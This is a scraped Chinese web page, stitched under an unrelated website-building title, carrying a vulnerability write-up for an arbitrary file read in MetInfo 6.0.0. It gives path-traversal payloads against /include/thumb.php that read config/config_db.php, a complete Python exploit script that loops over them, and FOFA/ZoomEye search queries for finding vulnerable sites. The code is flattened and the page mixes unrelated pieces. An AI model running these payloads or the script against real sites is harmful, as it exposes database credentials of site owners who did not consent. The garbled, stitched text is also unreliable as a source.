当前位置: 首页 > news >正文

金阊苏州网站建设网页登陆界面怎么做

金阊苏州网站建设,网页登陆界面怎么做,百度推广代理公司,wordpress 上传文件大小文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称#xff1a;MetInfo任意文件读取 漏洞简介#xff1a;MetInfo是一套使用PHP和MySQL开发的内容管理系统#xff0c;其… 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称MetInfo任意文件读取 漏洞简介MetInfo是一套使用PHP和MySQL开发的内容管理系统其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞攻击者可利用该漏洞读取网站的敏感文件。 下载地址历史版本安装文件下载 Ver_6.0.0 1.2、漏洞等级 高危 1.3、影响版本 影响版本MetInfo 6.0.0 1.4、漏洞复现 代码审计 defined(IN_MET) or exit(No permission);load::sys_class(web);class old_thumb extends web{public function doshow(){global $_M;$dir str_replace(array(../,./), , $_GET[dir]);if(substr(str_replace($_M[url][site], , $dir),0,4) http strpos($dir, ./) false){header(Content-type: image/jpeg);ob_start();readfile($dir);ob_flush();flush();die;}$dir str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]); dir变量接受来自$_GET[‘dir’]传递进来的值用了str_replace函数做替换将.././替换成空值 readfile($dir); 漏洞点 /include/thumb.php使用bp进行抓包 测试一 /include/thumb.php?dir..././http/..././config/config_db.php测试二 /include/thumb.php?dir.....///http/.....///config/config_db.php测试三 /include/thumb.php?dirhttp/.....///.....///config/config_db.php测试四 /include/thumb.php?dirhttp\..\..\config\config_db.php# 此POC 仅适用于Windows 系统Linux 下无效 # 只有windows以右斜杠作为文件路径分隔符1.5、深度利用 EXP编写 import requests import sysbanner MetInfo 6.0.0___________.__.__ __________ .___\_ _____/|__| | ____ \______ \ ____ _____ __| _/| __) | | | _/ __ \ | _// __ \\__ \ / __ | | \ | | |_\ ___/ | | \ ___/ / __ \_/ /_/ | \___ / |__|____/\___ |____|_ /\___ ____ /\____ | \/ \/ \/ \/ \/ \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/ headers {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 }dir_list [..././http/..././config/config_db.php,.....///http/.....///config/config_db.php,http/.....///.....///config/config_db.php,http\..\..\config\config_db.php ]def attack(host):vul /include/thumb.phpurl host vulres requests.get(url url, headers headers)if res.status_code ! 200:print(f[INFO] {vul} is Not Exists!)exit()print(f[INFO] {vul} is Exists!)for param in dir_list:params {dir: param }res requests.get(url url, params params, headers headers)print(f[INFO] Test URL: {res.url})if ?php in res.text:print([RESULT] The target is vulnreable!)print(f[RESULT]\n{res.text})breakif len(sys.argv) 2:print(banner)exit()host sys.argv[1]attack(host host)1.6、漏洞挖掘 FOFA appmetinfoZoomEye app:MetInfo app:MetInfoos:Windows1.7修复建议 升级打补丁上设备
http://www.sadfv.cn/news/2377/

相关文章: